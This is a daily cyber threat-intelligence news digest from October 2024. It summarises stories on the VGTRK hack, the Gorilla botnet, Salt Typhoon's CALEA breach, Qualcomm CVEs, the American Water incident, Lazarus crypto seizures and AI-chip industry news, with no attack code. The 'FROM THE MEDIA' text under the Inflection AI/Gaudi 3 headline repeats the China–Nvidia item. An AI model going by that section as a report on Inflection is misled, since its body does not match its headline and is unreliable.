Daily Drop (884): Foxconn: MX | AI Drone: SAR | CN: Exploit CALEA | VGTRK | U.S. Water Provider: MyPay | Brent Crude Surge | Lazarus GRP | Qualcomm DSP Vul | Gorilla Botnet | CN: Nvidia | Gaudi 3 |
10-08-24
Tuesday, Oct 08 2024 // (IG): BB // ScraperDaddy // Cloud Email Harvester
Pro-Ukraine Hackers Disrupt Russian State Media Company VGTRK in Major Cyberattack
Bottom Line Up Front (BLUF): Pro-Ukraine hackers launched a cyberattack against Russia's state broadcasting company VGTRK, disrupting broadcasts on channels such as Russia 1 and Russia 24 for nearly an hour and reportedly deleting data from VGTRK’s servers. Russian officials have condemned the incident as part of a “hybrid warfare” campaign allegedly supported by Western interests.
Analyst Comments: This incident highlights the intensifying cyber conflict between pro-Ukrainian and pro-Russian actors, where attacks on media outlets have become symbolic strikes against governmental influence. The breach of VGTRK—a key vehicle for Russian state messaging—represents a shift in the digital battle toward disrupting information channels directly. If confirmed, destroying backup data could signal an evolution in hacktivist tactics, focusing more on persistent operational damage. The incident may fuel Russia’s push for international cybersecurity discussions at the U.N. as it seeks to frame the narrative as part of a broader anti-Russian campaign.
FROM THE MEDIA: On October 7, pro-Ukraine hackers reportedly carried out an "unprecedented" cyberattack on VGTRK, Russia’s state media organization. Although the company’s spokesperson initially claimed minimal impact, local reports indicate that broadcasts were disrupted on VGTRK’s primary channels for nearly an hour, and data, including backups, was allegedly deleted from VGTRK servers. This attack, attributed to the pro-Ukraine hacktivist group Sudo rm-RF, follows similar disruptions to Russian media in recent months. Russian Foreign Ministry representative Maria Zakharova described the incident as part of a Western “hybrid warfare” strategy, suggesting that Russia may address the issue with international bodies such as the U.N. and UNESCO.
READ THE STORY: The Record
China Encourages AI Buyers to Opt for Local Alternatives Over Nvidia Amid Rising Tech Independence Efforts
Bottom Line Up Front (BLUF): Chinese authorities are encouraging domestic organizations to prioritize local AI accelerator options, such as Huawei, instead of Nvidia, although no official restrictions have been imposed. This guidance aligns with China's recent push to bolster local tech capabilities amid ongoing international trade and tech tensions.
Analyst Comments: This development is part of a broader trend in China’s technological policy aimed at reducing dependence on foreign tech, particularly from U.S. companies. As U.S. export controls on high-performance chips tighten, China’s recommendation to use Huawei products indicates its focus on developing self-sufficient AI infrastructure. Although Huawei’s current AI chips reportedly fall short of Nvidia’s, continued investment and development in domestic technology could eventually reduce China’s need for foreign AI accelerators, potentially impacting Nvidia’s revenue in the region.
FROM THE MEDIA: According to anonymous sources cited by South China Morning Post, Chinese authorities are informally advising organizations to choose locally developed AI accelerators, notably those from Huawei, over Nvidia products. This comes as U.S.-based Nvidia prepares to release its new Blackwell AI chips, widely considered leaders in the field. China Telecom recently highlighted its capacity for training large language models on homegrown hardware, signaling progress toward self-reliant AI compute power. This guidance from Chinese authorities reflects a continued push for domestic alternatives in the face of U.S. restrictions on advanced semiconductors and AI hardware.
READ THE STORY: The Register
Vulnerable APIs and Bot Attacks Lead to $186 Billion in Annual Business Losses
Bottom Line Up Front (BLUF): A recent report by Imperva and Marsh McLennan highlights the financial and operational risks companies face due to vulnerable APIs and bot attacks. Global businesses incur losses estimated at $94–$186 billion annually. With API-related incidents rising by 40% in 2022 and bot-driven attacks surging by 88%, large enterprises are particularly at risk of significant financial and reputational damage.
Analyst Comments: The growing interdependency between APIs and bot-driven attacks is reshaping the threat landscape, particularly for large organizations with extensive digital infrastructures. These attacks are often fueled by generative AI, which amplifies attackers’ capabilities to bypass standard defenses. As reliance on APIs intensifies, especially among enterprises pursuing digital transformation, these vulnerabilities may evolve into a primary security focal point. Collaborating across departments will be critical to developing comprehensive API and bot management strategies to contain risks and secure organizational assets.
FROM THE MEDIA: According to The Economic Impact of API and Bot Attacks report by Imperva, businesses are losing billions annually due to API vulnerabilities and bot-driven cyberattacks. APIs, which facilitate data exchange and operational efficiency, have introduced new attack vectors as companies integrate hundreds of endpoints into their operations. 2022 API-related security incidents climbed by 40%, while bot attacks surged by 88%, contributing to $116 billion in bot-related losses. Bots are primarily responsible for credential stuffing, online fraud, and DDoS attacks, with Imperva noting that automated threats now drive 30% of API attacks. With their complex digital ecosystems, large enterprises are three times more likely to experience API abuse and bot attacks than smaller businesses. Imperva recommends a collaborative approach, incorporating API security and bot management into a comprehensive defense strategy to address these escalating threats.
READ THE STORY: THN
AI-Enhanced Drones Revolutionize Search and Rescue with Successful Deployment in Scotland
Bottom Line Up Front (BLUF): Two British Mountain Rescue volunteers have developed advanced AI-driven software that automates drone searches for missing persons. They have succeeded in locating a missing hiker in Scotland. This breakthrough in drone technology provides rapid, thorough area coverage, bringing new hope to search and rescue missions, particularly in remote or treacherous terrain.
Analyst Comments: This innovation marks a significant step forward in using AI to enhance public safety efforts, reducing search times and the physical toll on rescue personnel. The drone software’s ability to autonomously identify “unusual” colors and features against natural backdrops is especially useful in mountainous regions where conventional visual searches struggle. The success of this technology may prompt broader adoption of automated, AI-enhanced tools across rescue and emergency services globally, likely sparking further advancements in autonomous drone capabilities for challenging search scenarios.
FROM THE MEDIA: In a groundbreaking application of AI in search and rescue, British Mountain Rescue volunteers Dan Roach and David Binks developed an automated drone software capable of locating missing persons with heightened efficiency. The system was deployed in Glencoe, Scotland, following the disappearance of hiker Charlie Kelly. Despite extensive search efforts involving traditional teams and equipment, Kelly remained missing for over a month until Binks and Roach’s software located him within an hour. By automating flight paths and image analysis, the drone software allows rapid area coverage, flagging color clusters that differ from the natural landscape. This AI-driven solution has already shown significant promise, locating Kelly in a hard-to-see gully by identifying his clothing colors as anomalies in the dense, rocky terrain.
READ THE STORY: Wired
Inflection AI Chooses Intel's Gaudi 3 Over Nvidia GPUs for New Enterprise Platform
Bottom Line Up Front (BLUF): Inflection AI is shifting its latest enterprise offering to run on Intel’s Gaudi 3 accelerators rather than Nvidia GPUs, citing improved price performance. With Intel’s Tiber AI Cloud hosting the platform, the company aims to offer AI-powered solutions to enterprises at a lower cost. However, on-premises options will be available for clients requiring local data storage.
Analyst Comments: Inflection AI's adoption of Gaudi 3 highlights the potential shift toward more cost-effective AI accelerators as Intel competes to gain traction in the GPU market traditionally dominated by Nvidia. Intel's aggressive pricing strategy, combined with Gaudi 3’s competitive performance, could make Intel a viable option for companies balancing budgets with computational demands. However, with Nvidia’s next-gen Blackwell GPUs on the horizon, Intel may face an uphill battle in maintaining this momentum. Inflection’s choice also underscores the rising demand for diverse, customizable AI infrastructure options in enterprise settings.
FROM THE MEDIA: According to anonymous sources cited by South China Morning Post, Chinese authorities informally advise organizations to choose locally developed AI accelerators, notably those from Huawei, over Nvidia products. This comes as U.S.-based Nvidia prepares to release its new Blackwell AI chips, which are widely considered leaders in the field. China Telecom recently highlighted its capacity for training large language models on homegrown hardware, signaling progress toward self-reliant AI computing power. This guidance from Chinese authorities reflects a continued push for domestic alternatives in the face of U.S. restrictions on advanced semiconductors and AI hardware.
READ THE STORY: The Register
Gorilla Botnet Unleashes 300,000 DDoS Attacks Across 100 Countries, Exploiting Apache Hadoop YARN Vulnerability
Bottom Line Up Front (BLUF): The newly identified Gorilla botnet, based on the Mirai source code, has conducted over 300,000 Distributed Denial of Service (DDoS) attacks globally, targeting sectors from government and banking to telecoms. Armed with multiple DDoS methods and exploiting vulnerabilities in Apache Hadoop YARN, the botnet has attacked devices in over 100 countries, with notable impact in the U.S., Canada, Germany, and China.
Analyst Comments: The Gorilla botnet’s emergence emphasizes the persistent threat posed by Mirai-based malware variants. By integrating the Apache Hadoop YARN exploit, Gorilla expands its attack surface significantly, highlighting the need for updated vulnerability patching, especially in IoT and cloud infrastructure. The botnet’s deployment of encryption methods akin to the Keksec group suggests that Gorilla may leverage sophisticated techniques to evade detection and maintain long-term control. Given its broad attack capabilities, this botnet could prompt heightened DDoS protections and an increased focus on securing cloud-based architectures and IoT devices.
FROM THE MEDIA: Gorilla, a new botnet derived from the infamous Mirai botnet code, launched over 300,000 DDoS attacks across 100 countries between September 4 and September 27, 2024. Discovered by NSFOCUS, the botnet primarily deploys UDP, SYN, and ACK flood techniques to target institutions across multiple sectors, including government, telecom, and gaming. With support for ARM, MIPS, x86_64, and x86 CPU architectures, the botnet exploits a known Apache Hadoop YARN vulnerability to achieve remote code execution on IoT and cloud systems. Persistence mechanisms in Gorilla involve creating a custom service to trigger downloads of malicious scripts on each startup, potentially enabling sustained and undetected control over infected systems. Researchers also report that the botnet’s activity includes encryption similar to that used by the Keksec group to hide crucial data.
READ THE STORY: THN
Chinese Hackers Exploit CALEA Backdoors in U.S. Telecom Networks for Data Collection
Bottom Line Up Front (BLUF): China-backed hacking group Salt Typhoon reportedly breached U.S. telecom providers’ wiretap systems, likely accessing extensive data from American telecom users. These intrusions expose critical vulnerabilities in the Communications Assistance for Law Enforcement Act (CALEA)- mandated backdoors, which were designed for lawful surveillance but have now become points of exploitation by foreign actors.
Analyst Comments: The compromise of CALEA wiretap systems underscores the inherent risks of government-mandated backdoors in critical infrastructure. By exploiting these backdoors, Salt Typhoon has potentially accessed massive amounts of private data, undermining U.S. national security. This incident may push U.S. lawmakers to reconsider policies on mandated surveillance access and encourage encryption and security measures that resist backdoor entry. The incident will likely fuel ongoing debates in the EU, where backdoor requirements are under legislative review, emphasizing the risk of these vulnerabilities in any nation’s digital infrastructure.
FROM THE MEDIA: According to recent reports from the Wall Street Journal, pro-China hackers from the group Salt Typhoon have penetrated wiretap infrastructure in multiple major U.S. telecom companies, including AT&T, Lumen, and Verizon. Mandated under CALEA, these wiretap systems allow authorized access for law enforcement but have now been exploited to collect American internet traffic and other sensitive data. Security experts, including Matt Blaze and Riana Pfefferkorn, note that these backdoors have long been considered high-risk attack points. Blaze labeled the breach as an inevitable consequence of CALEA's requirements. This incident is seen as potentially catastrophic, as Salt Typhoon’s involvement signals possible intent for strategic data collection in anticipation of future U.S.-China conflicts. The breach has reignited calls for enhanced encryption and secure, backdoor-free systems.
READ THE STORY: TC
Qualcomm Advises OEMs to Patch Exploited DSP and WLAN Vulnerabilities in Critical Update
Bottom Line Up Front (BLUF): Qualcomm has issued security patches to fix critical vulnerabilities in its DSP and WLAN components, urging original equipment manufacturers (OEMs) to update immediately. The DSP flaw, CVE-2024-43047, is actively exploited, potentially in spyware attacks, while a WLAN flaw, CVE-2024-33066, carries a high risk of memory corruption.
Analyst Comments: The DSP and WLAN vulnerabilities highlight the growing security challenges in digital signal processing and wireless components, areas often overlooked in mobile security. Qualcomm’s proactive patch for CVE-2024-43047, reportedly exploited in targeted attacks, suggests that high-risk entities, like civil society members, may be impacted. The involvement of organizations like Google’s Threat Analysis Group and Amnesty International Security Lab further implies sophisticated exploitation likely employed in surveillance or espionage operations. These vulnerabilities are a critical reminder of the necessity for timely OEM patch deployment across the Android ecosystem to prevent escalating risks.
FROM THE MEDIA: Qualcomm released patches addressing nearly two dozen vulnerabilities, including CVE-2024-43047, a high-severity DSP Service flaw, and CVE-2024-33066, a critical WLAN vulnerability. CVE-2024-43047, identified by Google Project Zero and confirmed as exploited in targeted attacks by Amnesty International, involves a “user-after-free” bug in DSP components, leading to memory corruption risks. Qualcomm has distributed patches to OEMs, emphasizing prompt implementation to mitigate further risk. The CVE-2024-33066 WLAN flaw, with a CVSS score of 9.8, allows for unauthorized memory access through improper input validation. The update coincides with Google’s Android security bulletin, which includes fixes for additional vulnerabilities from MediaTek and Imagination Technologies.
READ THE STORY: THN
Cyberattack Forces American Water to Shut Down Customer App, Billing System
Bottom Line Up Front (BLUF): American Water, the largest U.S. regulated water provider, recently took its MyWater customer billing app offline following a cyberattack. Although the company isolated affected networks and stated that water quality remains uncompromised, it suspended billing operations and engaged law enforcement to investigate.
Analyst Comments: This incident reflects broader concerns about the vulnerability of U.S. water utilities, which continue to face both ransomware and state-sponsored threats. Recent attacks on other water systems underscore the security gap within critical infrastructure, which is often reliant on legacy operational technology (OT) and under-resourced cybersecurity programs. Strengthening OT security standards and oversight may be essential to prevent future disruptions threatening service availability and public trust.
FROM THE MEDIA: On October 7, American Water confirmed it had disconnected parts of its network and paused the MyWater app in response to a cybersecurity incident discovered on October 3. The company, which serves over 14 million U.S. residents, filed an SEC 8-K report stating that water supply and quality are unaffected. Officials also stated that they isolated compromised areas to prevent the attack’s spread and are actively investigating alongside law enforcement. American Water reported that no customer data breaches or operational disruptions have been detected, but they declined to disclose whether ransomware was involved. This event highlights ongoing efforts by agencies, including the EPA, to enhance cybersecurity protocols in critical sectors like water and wastewater, which remain highly susceptible to cyber threats.
READ THE STORY: The Record
Brent Crude Surges Above $80 Amid Middle East Tensions and Hurricane Risks
Bottom Line Up Front (BLUF): Brent crude oil prices jumped above $80 per barrel this week as investors reacted to potential supply disruptions from both geopolitical tensions in the Middle East and Hurricane Milton’s threat to U.S. Gulf Coast production. The potential for Israeli strikes on Iranian oil infrastructure and hurricane-related shutdowns has amplified supply concerns, propelling oil prices to their highest levels since August.
Analyst Comments: The latest surge in Brent crude highlights the oil market's sensitivity to geopolitical and natural disruptions, particularly with low spare production capacity. The risks posed by ongoing Middle East tensions could lead to prolonged volatility, especially if hostilities between Israel and Iran escalate, jeopardizing the Strait of Hormuz. This scenario could propel prices even higher, while Gulf Coast weather disruptions add further uncertainty. The oil market may see sustained upward pressure, particularly if any supply outages are significant and prolonged, leaving OPEC in a critical balancing role.
FROM THE MEDIA: Oil prices rallied on Monday as Brent crude surpassed $80 a barrel, fueled by concerns over escalating conflict in the Middle East and Hurricane Milton’s approach to U.S. Gulf Coast oil facilities. The Israeli government has reportedly considered targeting Iranian oil facilities following last week’s missile attack by Iran-aligned forces. Meanwhile, Hurricane Milton, now a Category 5 storm, has prompted Chevron to evacuate personnel and halt operations on one of its platforms. Hedge funds have adjusted their short positions in response to rising prices, indicating a shift toward bullish positions on oil. West Texas Intermediate crude also rose, crossing $77 per barrel. Analysts, including those at Goldman Sachs, warn that any sustained disruptions could drive prices even higher.
READ THE STORY: FT
U.S. Government Seeks to Reclaim $2.67 Million from North Korean Lazarus Group Crypto Heists
Bottom Line Up Front (BLUF): The U.S. government is taking legal action to seize over $2.67 million from North Korea's Lazarus Group, believed to be responsible for multiple high-profile cryptocurrency thefts, including the Deribit and Stake.com hacks. These lawsuits mark the latest in the U.S. Department of Justice’s efforts to recover digital assets stolen by North Korean cyber operatives.
Analyst Comments: The Lazarus Group's continued success in high-profile cryptocurrency thefts underscores the challenges of tracking and seizing digital assets in the crypto space. Although the U.S. has had some success in freezing illicit funds, the fact that large portions still evade capture highlights a persistent risk for crypto platforms. This situation may prompt exchanges and crypto wallet providers to reconsider security protocols and increase collaboration with law enforcement. With North Korea allegedly funding its state operations through such activities, ongoing recovery efforts will likely be central to U.S. policy in countering the North's cyber aggression.
FROM THE MEDIA: The Department of Justice has filed lawsuits to recover over $2.67 million in digital assets pilfered by North Korea's Lazarus Group, known for its sophisticated cybercrime operations. The first lawsuit targets $1.7 million in Tether linked to the 2022 Deribit hack, in which $28 million was stolen. The Lazarus Group laundered these funds through various mixers, including Tornado Cash, until authorities managed to freeze the assets in five wallets. A second lawsuit involves the Lazarus Group’s theft of $41 million from Stake.com, an online gambling platform. The stolen funds were moved through Bitcoin mixers, including Sinbad and Yonmix before being distributed across virtual exchanges. Both cases form part of a more considerable U.S. government investigation into North Korean cybercrime, reportedly generating millions of dollars in illicit funds over the past decade. This investigation has linked Lazarus Group to other high-profile crypto thefts, including the $234.9 million WazirX breach.
READ THE STORY: The Register
Items of interest
Foxconn to Build World’s Largest Nvidia Superchip Facility in Mexico for Blackwell Platform Demand
Bottom Line Up Front (BLUF): Foxconn is constructing the world’s largest facility for Nvidia’s Blackwell Superchips in Mexico, addressing surging demand for AI infrastructure. The Taiwanese manufacturer, known for producing Apple’s iPhones, aims to leverage this AI-driven demand to expand its reach in advanced server manufacturing.
Analyst Comments: Foxconn’s expansion into Nvidia’s Blackwell production is a significant move, reinforcing the company’s strategy to pivot from consumer electronics towards AI and EV markets. This venture highlights Mexico's growing importance in global tech supply chains and Foxconn's readiness to support the AI revolution through advanced cooling and infrastructure innovations. With Nvidia's Blackwell chips forecasted to generate billions in Q4 revenue, Foxconn is positioned to capture substantial value from the burgeoning AI sector, which could catalyze further diversification, including its commitment to EV manufacturing.
FROM THE MEDIA: Foxconn announced plans to build the world’s largest Nvidia super chip production facility in Mexico, specifically for Nvidia’s upcoming Blackwell platform, at its annual tech day in Taipei. Nvidia began shipping samples of Blackwell chips in August, anticipating strong market uptake by Q4. Benjamin Ting, Foxconn’s senior VP, emphasized that demand for Blackwell technology is unprecedented, with customers across sectors preparing for AI-driven transformations. Foxconn’s Mexico plant, a $500 million investment in Chihuahua, will integrate advanced cooling systems needed for AI hardware. Foxconn’s chairman, Young Liu, shared confidence in the company’s ability to lead AI server manufacturing, a sector driving the company's recent record quarterly revenue.
READ THE STORY: The Edge
Foxconn to invest US $241M in AI server manufacturing in Chihuahua (Video)
FROM THE MEDIA: Taiwanese electronics giant Foxconn has announced a $241.2 million investment to boost AI server production at its Ciudad Juárez plant in Chihuahua, Mexico. The facility, known as Planta Óscar Flores, has been manufacturing AI servers since 2005 and is part of Foxconn’s strategy to expand its regional operations. This investment is set to enhance Mexico’s role in AI technology development.
Foxconn, Nvidia team up to build 'AI factories' (Video)
FROM THE MEDIA: Foxconn Chairman Liu Young-way and Nvidia CEO Jensen Huang said their companies would build ‘AI factories’ together, creating a new kind of data center for a range of applications including self-driving cars.
The selected stories cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in its original material or related links on its sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.